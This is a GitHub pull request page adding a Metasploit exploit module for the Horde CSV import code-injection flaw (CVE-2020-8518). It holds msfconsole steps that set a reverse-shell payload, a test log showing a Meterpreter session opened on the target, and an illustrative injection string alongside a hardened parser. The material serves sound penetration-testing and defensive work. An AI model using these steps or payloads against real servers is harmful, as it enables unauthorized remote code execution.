
Add 'Horde CSV import arbitrary PHP code execution' (CVE-2020-8518) #13082

Merged
merged 7 commits into from Mar 23, 2020

Conversation

cyrus-and commented Mar 14, 2020

This adds a module for the vulnerability in the subject. An excerpt from the documentation follows.

Vulnerable Application

The Horde project comprises several standalone applications and libraries. The Horde Groupware Webmail Edition suite (tested version 5.2.22) bundles several of them by default; among those, Data (Horde Data API) is a library used to manage data import/export in several formats, e.g., CSV, iCalendar, vCard. This library up to version 2.1.4 (included) is vulnerable to PHP code injection.

Find more information in the original advisory.

Verification Steps

  1. Install the application (see below)
  2. Start msfconsole
  3. Do: use exploit/multi/http/horde_csv_rce
  4. Do: set payload php/meterpreter/reverse_tcp
  5. Do: set lhost [ATTACKER IP]
  6. Do: set rhost [TARGET IP]
  7. Do: set username [username]
  8. Do: set password [password]
  9. Do: exploit
  10. A session should open

Downgrade the Horde Data API package if needed:

pear uninstall --ignore-errors horde/horde_data-2.1.5
pear install --ignore-errors horde/horde_data-2.1.4

This is my first MSF module submission, I apologize if something's wrong or missing.

space-r7 left a comment

Hi @cyrus-and, thank you for submitting your module! I have a few comments that are mostly based on style.

modules/exploits/multi/http/horde_csv_rce.rb (5 review comments, outdated, resolved)
cyrus-and and others added 5 commits Mar 17, 2020
Co-Authored-By: Shelby Pace <40177151+space-r7@users.noreply.github.com>
Co-Authored-By: Shelby Pace <40177151+space-r7@users.noreply.github.com>
Co-Authored-By: Shelby Pace <40177151+space-r7@users.noreply.github.com>
Co-Authored-By: Shelby Pace <40177151+space-r7@users.noreply.github.com>
cyrus-and commented Mar 17, 2020

Hi @cyrus-and, thank you for submitting your module!

Thanks for the review!

Feel free to eventually squash all the commits, I took advantage of the GitHub interface to accept your proposed changes.

@space-r7 space-r7 self-assigned this Mar 18, 2020
space-r7 commented Mar 23, 2020

Had a few issues getting the software installed, but finally got to test:

msf5 > use exploit/multi/http/horde_csv_rce
msf5 exploit(multi/http/horde_csv_rce) > set rhosts 172.16.215.227
rhosts => 172.16.215.227
msf5 exploit(multi/http/horde_csv_rce) > set lhost 172.16.215.1
lhost => 172.16.215.1
msf5 exploit(multi/http/horde_csv_rce) > set username blah
username => blah
msf5 exploit(multi/http/horde_csv_rce) > set password password
password => password
msf5 exploit(multi/http/horde_csv_rce) > set verbose true
verbose => true
msf5 exploit(multi/http/horde_csv_rce) > run

[*] Started reverse TCP handler on 172.16.215.1:4444 
[+] Logged in as blah:password
[*] Uploading jbKQiLUt.csv
[+] CSV file uploaded
[*] Sending payload: eval(base64_decode(...))
[*] Sending stage (38288 bytes) to 172.16.215.227
[*] Meterpreter session 1 opened (172.16.215.1:4444 -> 172.16.215.227:48144) at 2020-03-23 07:27:20 -0500

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 4.18.0-15-generic #16~18.04.1-Ubuntu SMP Thu Feb 7 14:06:04 UTC 2019 x86_64
Meterpreter : php/linux

I also changed a few things: randomized the uploaded file, added a vprint_status statement, and removed the threading part. I haven't had any issues testing, but we can add that back if it is necessary for something I'm not seeing.

space-r7 added a commit that referenced this pull request Mar 23, 2020
@space-r7 space-r7 merged commit 40d6dd1 into rapid7:master Mar 23, 2020
3 checks passed
Metasploit Automation - Sanity Test Execution: Successfully completed all tests.
Metasploit Automation - Test Execution: Successfully completed all tests.
continuous-integration/travis-ci/pr: The Travis CI build passed
space-r7 commented Mar 23, 2020

Release Notes

An exploit module is available for the Horde Data API that gets bundled with software such as Horde Groupware Webmail Edition Suite. The Horde Data API before and including v2.1.4 has functionality to handle importing/exporting data such as from CSV files, but fails to properly escape strings while parsing the data. An authenticated user can gain code execution by uploading a CSV file and submitting the payload in the quote parameter of a POST request to mnemo/data.php.
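
The release notes above describe the bug class without showing it: a CSV import option (the quote character) that reaches code-evaluation without escaping, so an authenticated user who controls that one request parameter gets code execution. The following is an added illustration in Ruby (the language of the Metasploit module), not code from Horde or from this PR. It assumes, purely for the demonstration, that the quote value is spliced into source text that is then eval'd; the page only says that strings are not properly escaped while parsing, so the exact Horde mechanism is not claimed here. `SAMPLE_CSV`, `MALICIOUS_QUOTE`, `parse_csv_vulnerable`, `parse_csv_safe` and `injection_demo` are all constructed names for this example.

```ruby
require 'csv'

# Constructed sample input for this illustration (not a Horde export).
SAMPLE_CSV = "name,note\n\"Alice\",\"hello, world\"\n\"Bob\",\"bye\"\n".freeze

# A quote value shaped like the attack described in the release notes: it
# closes the string literal, appends a statement, and comments out the rest.
# The assignment to $injected_marker stands in for a real payload.
MALICIOUS_QUOTE = %q[x'); $injected_marker = 'code ran' #].freeze

# VULNERABLE pattern (assumed for illustration, not Horde's code): the
# user-controlled quote character is interpolated into source text which is
# then eval'd. Nothing escapes it, so a value containing the closing
# delimiter breaks out of the literal and runs as Ruby.
def parse_csv_vulnerable(data, quote)
  code = "CSV.parse(data, quote_char: '#{quote}')"
  eval(code) # eval sees the local `data`; `quote` is now code, not data
end

# HARDENED form: the option is validated and passed as an ordinary argument.
# No source text is built from input, so there is nothing to break out of.
class InvalidQuoteChar < ArgumentError; end

def parse_csv_safe(data, quote)
  unless quote.is_a?(String) && quote.length == 1
    raise InvalidQuoteChar, "quote must be a single character, got #{quote.inspect}"
  end
  CSV.parse(data, quote_char: quote)
end

# Runs the vulnerable parser with the malicious quote and returns the marker
# set by the injected statement ('code ran' if the injection executed).
def injection_demo
  $injected_marker = nil
  parse_csv_vulnerable(SAMPLE_CSV, MALICIOUS_QUOTE)
  $injected_marker
end

if __FILE__ == $PROGRAM_NAME
  p parse_csv_safe(SAMPLE_CSV, '"')
  puts "vulnerable parser with malicious quote: #{injection_demo.inspect}"
  begin
    parse_csv_safe(SAMPLE_CSV, MALICIOUS_QUOTE)
  rescue InvalidQuoteChar => e
    puts "hardened parser rejected it: #{e.message}"
  end
end
```

The takeaway for anyone reviewing an import feature is the shape of the fix, not the payload: a delimiter option must be validated to a single character and handed to the parser as an argument, never concatenated into code. On the defensive side, the module's verbose output above (`Sending payload: eval(base64_decode(...))`) shows what an exploitation attempt looks like in the `quote` field of the POST to `mnemo/data.php`, which is a usable signature for web-log review.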

cyrus-and commented Mar 23, 2020

Had a few issues getting the software installed

Thank you! Installing Horde from scratch is not the most pleasant thing to do...

@tdoan-r7 tdoan-r7 added the rn-modules label Apr 1, 2020
4 participants